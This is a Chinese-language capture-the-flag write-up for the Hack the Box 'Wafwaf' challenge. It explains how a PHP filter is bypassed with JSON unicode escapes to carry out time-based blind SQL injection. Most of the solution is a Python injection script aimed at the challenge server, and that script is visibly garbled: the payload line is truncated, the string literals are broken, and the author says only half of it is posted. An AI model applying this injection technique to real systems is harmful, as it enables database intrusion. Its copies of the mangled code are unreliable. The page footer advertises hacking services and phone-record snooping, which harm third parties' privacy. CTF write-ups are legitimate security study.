Hack the Box——Wafwaf(代码审计) wp

访客4年前黑客资讯809

0x00前言


又开始了一天的学习之路,首先打开了我的Hack the Box

Wafwaf

1611453329_600cd391641143be627d3.png!small?1611453329717

提示:My clas *** ate Jason made this *** all and super secure note taking application, check it out!(我的同学Jason *** 了这个小型且超级安全的笔记记录应用程序,请查看!)


0x01访问网站


访问界面,简单明了,直接给了源码

http://159.65.87.50:31703/

1611453347_600cd3a3048db28be997e.png!small?1611453347301

显然就是代码审计了

简单看下代码,流程就是:php://input获取数据=> waf函数验证非法字符=>? 解码json数据=> 执行sql语句

0x02代码分析

  • error_reporting(0)? 关闭错误报告。

  • preg_match_all? ? ? 函数用于执行一个全局正则表达式匹配。

  • preg_quote()? ? ? ? ? 需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。

  • 正则表达式特殊字符有: . \ + * ? [ ^ ] $ ( ) { }=! < > | : -

  • json_decode? ? ? ? ? 对 *** ON 格式的字符串进行解码。

  • file_get_contents() 把整个文件读入一个字符串中。

问题

  • 没过滤全sql关键字,还可以注入

  • preg_match_all函数可能有问题,可能可以通过某种输入绕过正则

  • php://input可能有漏洞

  • json_decode函数可能有漏洞

0x03寻找答案

首先,检查 waf() *** 时,我们收到输入并验证筛选。如果不在筛选json_decode,则可以看到使用 *** 返回值。
query() *** 获取 $obj->user 的值并发送 SQL 请求,但查看返回值时,不会返回特定值,也不会输出错误。所以首先好像是Time Based Blind SQLI问题

然后,我们检查 waf 的参数值,获取并交出php://input的值。

php://input获取原始数据,该数据将作为 Post 请求的主体部分。

将值发送到原始数据,以便获取并输出该值。因此,让我们将 SQLI 有效负载作为原始数据

1611453427_600cd3f31e4867caa9220.png!small?1611453427445

在json_decode中,它转换为字符串并返回。Unicode Escape?可以在此处完成。

0x04解决问题

理论上应该可以用sqlmap自定义tamper去跑的,但是自己尝试半天没有成功,最后自己写了盲注脚本,花了我一下午的时间,最后跑这个脚本还等了我一晚上的时间

#!/usr/bin/python3
# -*- coding:utf-8 -*-
"""
@author: maple
@file: wafwaf.py
@time: 2021/1/23 17:10
@desc: 
"""

from requests import post
from time import time
from json import dumps

url="http://159.65.87.50:31703"
headers={'content-type': 'application/json'}
payload=
-".format(second_time - first_time))
    elif mode=='2':
        for i in range(100):
            first_time=time()
            if i < 10:
                unicode_="\0 + str(i)
            elif i >=10 and i < 20:
                unicode_="\1\0 + str(i)[1]
            elif i >=20 and i < 30:
                unicode_="\2\0 + str(i)[1]
            elif i >=30 and i < 40:
                unicode_="\3\0 + str(i)[1]
            elif i >=40 and i < 50:
                unicode_="\4\0 + str(i)[1]
            elif i >=50 and i < 60:
                unicode_="\5\0 + str(i)[1]
            elif i >=60 and i < 70:
                unicode_="\6\0 + str(i)[1]
            elif i >=70 and i < 80:
                unicode_="\7\0 + str(i)[1]
            elif i >=80 and i < 90:
                unicode_="\8\0 + str(i)[1]
            elif i >=90 and i < 100:
                unicode_="\9\0 + str(i)[1]
            else:
                unicode_="\1\0\0"
            post(url, data=json_update(query.format(unicode_), '0'), headers=headers)
            second_time=time()

            if second_time - first_time >=4.9:
                print("[*] Sleep : {}".format(second_time - first_time))
                print("[*] {} : {}
-".format(string, i))
                break
    elif mode=='3':
        result=''
        for j in range(1, Len + 1):
            unicode__="\0 + str(j)
            for i in range(33, 128):
                if i >=33 and i < 40:
                    unicode_="\3\0 + str(i)[1]
                elif i >=40 and i < 50:
                    unicode_="\4\0 + str(i)[1]
                elif i >=50 and i < 60:
                    unicode_="\5\0 + str(i)[1]
                elif i >=60 and i < 70:
                    unicode_="\6\0 + str(i)[1]
                elif i >=70 and i < 80:
                    unicode_="\7\0 + str(i)[1]
                elif i >=80 and i < 90:
                    unicode_="\8\0 + str(i)[1]
                elif i >=90 and i < 100:
                    unicode_="\9\0 + str(i)[1]
                elif i >=100 and i < 110:
                    unicode_="\1\0\0 + str(i)[2]
                elif i >=110 and i < 120:
                    unicode_="\1\1\0 + str(i)[2]
                elif i >=120 and i < 130:
                    unicode_="\1\2\0 + str(i)[2]
                else:
                    unicode_="\1\3\0 + str(i)[2]
                first_time=time()
                post(url, data=json_update(query.format(unicode__, unicode_), '0'), headers=headers)
                second_time=time()

                if second_time - first_time >=4.9:
                    result +=chr(i)
                    break
        print("[*] {} : {}".format(string, result))
        print("-")

代码此处贴一半,有需要的人自己尝试完善,也可以私聊我给你。

这套代码如果以后遇到基于时间的盲注还可以复用

最后脚本跑出来的结果

1611457881_600ce559490986a668954.png!small?1611457881705

0x05总结

因为一开始对这题没有任何思路,尝试了多种sqlmap知识,然后一直在google和百度,但是都没有找到解决办法,但是也乘机见识了很多新的姿势,比如各种绕过,也学会了编写时间注入的tamper脚本


相关文章

JasperLoader:主攻意大利的恶意软件加载器-黑客接单平台

在曩昔的几个月里,呈现了一种名为JasperLoader的新式歹意软件加载器,它以意大利和其他欧洲国家为方针,分发Gootkit等银行木马。咱们最近也宣布过JasperLoader相关特性的全面剖析,...

谁可以帮我查询别人的手机信息通话记录呢

. 很多人年会没中奖会发朋友圈来发泄自己郁闷心情,需要朋友的安慰,几年的中奖绝缘体太惨了,超高的中奖率也没有自己,年会没中奖怎么发朋友圈?2020年会没中奖朋友圈说说,下面友谊长存带来介绍。 20...

埃菲社:中国脱侍魂零人物贫战略让村民受益

  参考消息网10月4日报道 埃菲社马德里10月1日发表了题为《这就是中国削减贫困的战略之一》的报道,报道以四川省甘洛县蓼坪乡清水村为例,说明中国正在推进雄心勃勃且宏伟的脱贫项目,旨在结束农村地区的贫...

AIDA失效怎办?试试6+1文案方程式

AIDA失效怎办?试试6+1文案方程式

AIDA文案公式,是来自国际推销专家海英兹·姆·戈得曼(Heinz M Goldmann)总结的一个营销公式。 但凡相识过文案写作的人都相识这个公式,全世界险些所有文案、作家都在研究和利用它,甚至连...

细微广告:新用户注册免费领取0.1元,直接提现!

细微广告是一个发便民服务广告的平台,新用户注册可免费领取1米现金,可直接提现支付宝或者微信零钱,亲测秒到账。每约请一个人头奖励2米,不外约请奖励需要满10米才气提现,而且是人工审核,不适合在平台放单。...

黑客入侵车门锁(黑客破解汽车锁)

黑客入侵车门锁(黑客破解汽车锁)

本文导读目录: 1、联网的名爵智能门锁是否容易被黑客攻破 2、智能车时代,黑客是否能通过网络入侵并控制智能化的汽车? 3、名爵智能门锁联网是否有遭到黑客攻击的问题? 4、黑客真的能入侵我们...